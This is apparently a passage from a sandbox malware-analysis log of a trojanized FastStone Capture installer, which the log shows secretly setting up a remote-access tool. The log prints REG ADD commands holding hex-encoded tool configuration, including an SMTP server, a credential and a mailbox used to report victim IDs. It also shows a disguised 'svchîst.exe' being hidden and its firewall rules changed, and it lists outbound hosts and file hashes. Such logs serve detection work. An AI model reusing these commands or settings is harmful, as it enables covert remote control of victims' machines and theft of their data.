3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.37920.2020" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.37920.2020" /f
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\FastStone Capture\FSCapture.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c attrib -h -s -r "C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\*.*"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1704287999-475954601-507434648-99498296618945160581881223229-178814020-1478364456"
C:\Windows\SysWOW64\attrib.exe
attrib -h -s -r "C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\*.*"
C:\Program Files (x86)\FastStone Capture\FSCapture.exe
"C:\Program Files (x86)\FastStone Capture\FSCapture.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Program Files\FastStone Capture\FSCapture.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c RMDIR /s/q "C:\Users\Admin\AppData\Local\Temp\FastStone Capture"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\FastStone Capture 9.4" /f
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-399961077-1035419136-51538432659625727512808450381434048045-557356600-1801917240"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 19.0.9700.2132" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\FastStone Capture 9.4" /f
C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 19.0.9700.2132" /f
C:\Windows\SysWOW64\drivers\svchîst.exe
"C:\Windows\System32\drivers\svchîst.exe" /silentinstall
C:\Windows\SysWOW64\drivers\svchîst.exe
"C:\Windows\System32\drivers\svchîst.exe" /firewall
C:\Windows\SysWOW64\drivers\svchîst.exe
"C:\Windows\System32\drivers\svchîst.exe" /start
C:\Windows\SysWOW64\drivers\svchîst.exe
"C:\Windows\SysWOW64\drivers\svchîst.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +h +s "C:\Windows\System32\idfgvgjnghcdfb.reg"
C:\Windows\SysWOW64\attrib.exe
attrib +h +s "svchîst.exe"
C:\Windows\SysWOW64\attrib.exe
attrib -h -s "install.exe"
C:\Windows\SysWOW64\attrib.exe
attrib -h -s "install.cmd"
C:\Windows\SysWOW64\drivers\svchîst.exe
C:\Windows\SysWOW64\drivers\svchîst.exe -firewall
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | smtp.spaceweb.ru | udp |
| RU | 77.222.41.136:25 | smtp.spaceweb.ru | tcp |
| US | 8.8.8.8:53 | rms-server.tektonit.ru | udp |
| RU | 95.213.205.83:5655 | rms-server.tektonit.ru | tcp |
| RU | 109.234.156.179:5655 | tcp |
Files
memory/336-54-0x0000000075711000-0x0000000075713000-memory.dmp
memory/952-56-0x0000000000000000-mapping.dmp
memory/912-55-0x0000000000000000-mapping.dmp
memory/1788-58-0x0000000000000000-mapping.dmp
memory/1408-57-0x0000000000000000-mapping.dmp
memory/1148-59-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe
| MD5 | d11ab72ad73808bea3acf250e78c1d50 |
| SHA1 | b22161c8eba04d21c9d9bcb77ceba14e4a7b74b7 |
| SHA256 | b7bbc834fe7217105cc2064026235abff19d502f1a88a4b0ee7a4d345fa23f9b |
| SHA512 | fc153f01a4083abe1ddbf8b80b2164f1ae14200d5d2e1d33030420ee477cfa7e7cba34870226d6e27f60d5e130ff39908d38984fba28dde5324b68fefcf7bb31 |
\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe
| MD5 | d11ab72ad73808bea3acf250e78c1d50 |
| SHA1 | b22161c8eba04d21c9d9bcb77ceba14e4a7b74b7 |
| SHA256 | b7bbc834fe7217105cc2064026235abff19d502f1a88a4b0ee7a4d345fa23f9b |
| SHA512 | fc153f01a4083abe1ddbf8b80b2164f1ae14200d5d2e1d33030420ee477cfa7e7cba34870226d6e27f60d5e130ff39908d38984fba28dde5324b68fefcf7bb31 |
\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe
| MD5 | d11ab72ad73808bea3acf250e78c1d50 |
| SHA1 | b22161c8eba04d21c9d9bcb77ceba14e4a7b74b7 |
| SHA256 | b7bbc834fe7217105cc2064026235abff19d502f1a88a4b0ee7a4d345fa23f9b |
| SHA512 | fc153f01a4083abe1ddbf8b80b2164f1ae14200d5d2e1d33030420ee477cfa7e7cba34870226d6e27f60d5e130ff39908d38984fba28dde5324b68fefcf7bb31 |
\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe
| MD5 | d11ab72ad73808bea3acf250e78c1d50 |
| SHA1 | b22161c8eba04d21c9d9bcb77ceba14e4a7b74b7 |
| SHA256 | b7bbc834fe7217105cc2064026235abff19d502f1a88a4b0ee7a4d345fa23f9b |
| SHA512 | fc153f01a4083abe1ddbf8b80b2164f1ae14200d5d2e1d33030420ee477cfa7e7cba34870226d6e27f60d5e130ff39908d38984fba28dde5324b68fefcf7bb31 |
memory/708-64-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe
